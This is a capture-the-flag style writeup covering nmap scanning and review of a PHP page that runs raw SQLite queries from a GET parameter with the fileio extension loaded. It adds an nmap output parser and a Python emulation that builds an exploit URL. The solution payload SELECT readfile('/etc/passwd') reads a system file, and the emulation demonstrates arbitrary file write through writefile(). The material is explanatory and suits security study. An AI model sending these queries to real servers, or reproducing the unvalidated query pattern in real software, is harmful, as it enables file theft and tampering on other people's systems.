### By b13ss3d ###
Last updated
There's also a video version, if you want to check it out:
Port Scanning
First we run a port scan with nmap to identify the open ports and the services (and their versions) listening on them. The options used are:
-p <ports>: Only scan specified ports
-sCV: combines the options -sC and -sV (from the nmap help: -sC: equivalent to --script=default; -sV: Probe open ports to determine service/version info)
-n: Never do DNS resolution
-vvv: Increase verbosity level
-oN <file>: Output scan in normal format
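The scan is saved with -oN, and in a real engagement you rarely read that file by hand only once. The following Python parser is an added example (not part of the original writeup) that pulls the port table out of nmap normal output into structured rows. The sample output it runs on is constructed for the example: the host, banners and versions are made up, only the layout follows what nmap prints. It reads the column offsets from the PORT/STATE header line, because the columns change with verbosity (REASON only appears with -vv or --reason) and nmap aligns the rows to that header.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of nmap "normal" (-oN) output for a scan like the one in
# the writeup (-sCV -vvv). Host, banners and versions are made up; only the
# layout matches real nmap output.
SAMPLE_SCAN = """\
# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -p- -sCV -n -vvv -oN scan.txt 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up, received user-set (0.050s latency).
Scanned at 2024-01-01 12:00:00 UTC for 30s
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE REASON         VERSION
22/tcp   open   ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3306/tcp closed mysql   reset ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Jan  1 12:00:30 2024 -- 1 IP address (1 host up) scanned in 30.12 seconds
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp|sctp)\s")


def parse_nmap_normal(text: str) -> List[Dict[str, str]]:
    """Parse the port table of nmap -oN output into dicts keyed by column name.

    nmap aligns the table to the 'PORT STATE ...' header it prints, and the
    set of columns varies (REASON only with -vv/--reason), so the column
    offsets are taken from the header instead of being hard-coded.
    """
    columns: List[Tuple[str, int]] = []   # (lower-cased name, start offset)
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("PORT "):
            columns = [(name.lower(), line.index(name)) for name in line.split()]
            continue
        if not columns or not PORT_LINE.match(line):
            continue                      # banner, NSE script (|_...) or summary line
        row: Dict[str, str] = {}
        for i, (name, start) in enumerate(columns):
            end = columns[i + 1][1] if i + 1 < len(columns) else None
            row[name] = line[start:end].strip()   # short lines give '' for VERSION
        rows.append(row)
    return rows


def open_ports(rows: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(port, service, version) for every port nmap reports as open."""
    return [(r["port"], r["service"], r.get("version", ""))
            for r in rows if r["state"] == "open"]


if __name__ == "__main__":
    for port, service, version in open_ports(parse_nmap_normal(SAMPLE_SCAN)):
        print(f"{port:<10} {service:<8} {version}")
```

Running it prints one line per open port; on the constructed sample that is ssh on 22/tcp and http on 80/tcp, with the closed 3306/tcp filtered out. Point it at the file written by -oN to get the same summary for a real scan.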
The scan shows a web server listening on port 80. Let's open the site in a web browser to see what it serves:
Code review
The content is the code shown in the image above. Let's break it down step by step:
The code starts by checking if a GET parameter named 'QUERY' is set using isset($_GET['QUERY'])
If 'QUERY' is set:
It sets the content type of the response to plain text.
It creates a new in-memory SQLite database.
It loads an extension called 'libfileio.so'.
It enables exceptions for the database operations.
It executes the query provided in the GET parameter directly on the database.
It fetches the results of the query as a numeric array and dumps them to the output.
If 'QUERY' is not set, it displays the source code of the current file using highlight_file().
At this point you may be wondering, "What is libfileio.so???"
Searching for it on Google leads to a post on the SQLite Forum. In that post a user reports that loading the loadable extension ext/misc/fileio.c fails with the error "undefined symbol sqlite3_sqlitefileio_init", and another user suggests renaming the shared library to libfileio.so as the fix. The rename works because, when no entry point is given, SQLite derives it from the file name: the directory and any "lib" prefix are stripped, everything from the first "." onwards is dropped, and the remainder is wrapped as sqlite3_<name>_init. A library named libfileio.so is therefore expected to export sqlite3_fileio_init, which is exactly the entry point fileio.c defines.
Searching for that file in turn leads to fileio.c in the SQLite source tree (ext/misc/fileio.c), whose header comment documents the SQL functions it adds. The interesting part: readfile(X) reads file X and returns its contents as a BLOB, and writefile(X, Y) writes Y into file X and returns the number of bytes written. In other words, once this extension is loaded, plain SQL can read and write files on the server with the privileges of the web server process.
Solution
The main vulnerability here is the lack of validation: the script executes whatever SQL arrives in the 'QUERY' GET parameter, without any validation or escaping, on a database that has a file I/O extension loaded. To solve the target we read /etc/passwd by sending the query SELECT readfile('/etc/passwd') as the value of QUERY; the file contents come back in the var_dump() output. Note that writefile() hands the same attacker an arbitrary file write, so this is considerably more than a data-disclosure SQL injection.
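To make the whole chain reproducible offline, here is an added Python example (not code from the original writeup, and not the real libfileio.so) that emulates the PHP handler: a fresh in-memory SQLite database per request, the caller's SQL executed verbatim, and, in place of loadExtension('libfileio.so'), Python-implemented readfile()/writefile() registered under the same names and with the same basic contract as ext/misc/fileio.c. The /etc/passwd stand-in is a constructed temporary file so the script runs anywhere; exploit_url() shows how the query from the writeup is encoded into the QUERY parameter.

```python
import os
import sqlite3
import tempfile
from typing import Any, Dict, List, Optional, Tuple
from urllib.parse import urlencode


def run_query(query: str, file_functions: bool = False) -> List[Tuple[Any, ...]]:
    """Emulate the challenge's PHP handler.

    Like the PHP code, each call opens a fresh in-memory SQLite database and
    executes the caller-supplied SQL as-is, returning every result row.

    file_functions=True stands in for $db->loadExtension('libfileio.so'):
    it registers Python versions of readfile()/writefile() with the contract
    of ext/misc/fileio.c (readfile returns the file as a BLOB, or NULL if it
    cannot be opened; writefile returns the number of bytes written). This is
    an emulation written for the example, not the real extension.
    """
    db = sqlite3.connect(":memory:")

    def readfile(path: str) -> Optional[bytes]:
        try:
            with open(path, "rb") as f:
                return f.read()
        except OSError:
            return None

    def writefile(path: str, data: Any) -> Optional[int]:
        if isinstance(data, str):          # an SQL text literal arrives as str
            data = data.encode()
        try:
            with open(path, "wb") as f:
                return f.write(data)
        except OSError:
            return None

    if file_functions:
        db.create_function("readfile", 1, readfile)
        db.create_function("writefile", 2, writefile)  # fileio.c also accepts optional mode/mtime
    try:
        return db.execute(query).fetchall()
    finally:
        db.close()


def exploit_url(base: str, query: str) -> str:
    """URL that delivers `query` through the QUERY GET parameter."""
    return base + "?" + urlencode({"QUERY": query})


def demo() -> Dict[str, Any]:
    """Replay the writeup's steps against a constructed stand-in for /etc/passwd."""
    workdir = tempfile.mkdtemp()
    passwd = os.path.join(workdir, "passwd")      # constructed file, not the real one
    dropped = os.path.join(workdir, "dropped.txt")
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    out: Dict[str, Any] = {}
    try:
        # 1. Any SQL runs: the handler never validates QUERY.
        out["version"] = run_query("SELECT sqlite_version()")[0][0]
        # 2. Without the extension, readfile() is not a known SQL function.
        try:
            run_query(f"SELECT readfile('{passwd}')")
            out["without_ext"] = "available"
        except sqlite3.OperationalError as e:
            out["without_ext"] = str(e)
        # 3. With it loaded, the writeup's query returns the file as a BLOB ...
        out["passwd"] = run_query(f"SELECT readfile('{passwd}')", True)[0][0].decode()
        # ... NULL for a file the web server user cannot open ...
        out["missing"] = run_query("SELECT readfile('/nonexistent/path')", True)[0][0]
        # ... and writefile() turns the same bug into an arbitrary file write.
        out["written"] = run_query(f"SELECT writefile('{dropped}', 'pwned')", True)[0][0]
        with open(dropped) as f:
            out["readback"] = f.read()
    finally:
        for p in (passwd, dropped):
            if os.path.exists(p):
                os.unlink(p)
        os.rmdir(workdir)
    return out


if __name__ == "__main__":
    print(exploit_url("http://target/", "SELECT readfile('/etc/passwd')"))
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The "no such function: readfile" error in step 2 is what you would see against a plain SQLite build; it is the loaded extension, not SQLite itself, that turns the injection into file access. To run the genuine extension instead of the emulation, compile ext/misc/fileio.c as libfileio.so and load it with conn.enable_load_extension(True) followed by conn.load_extension("./libfileio.so") (in PHP, loadExtension() only looks in the directory set by sqlite3.extension_dir).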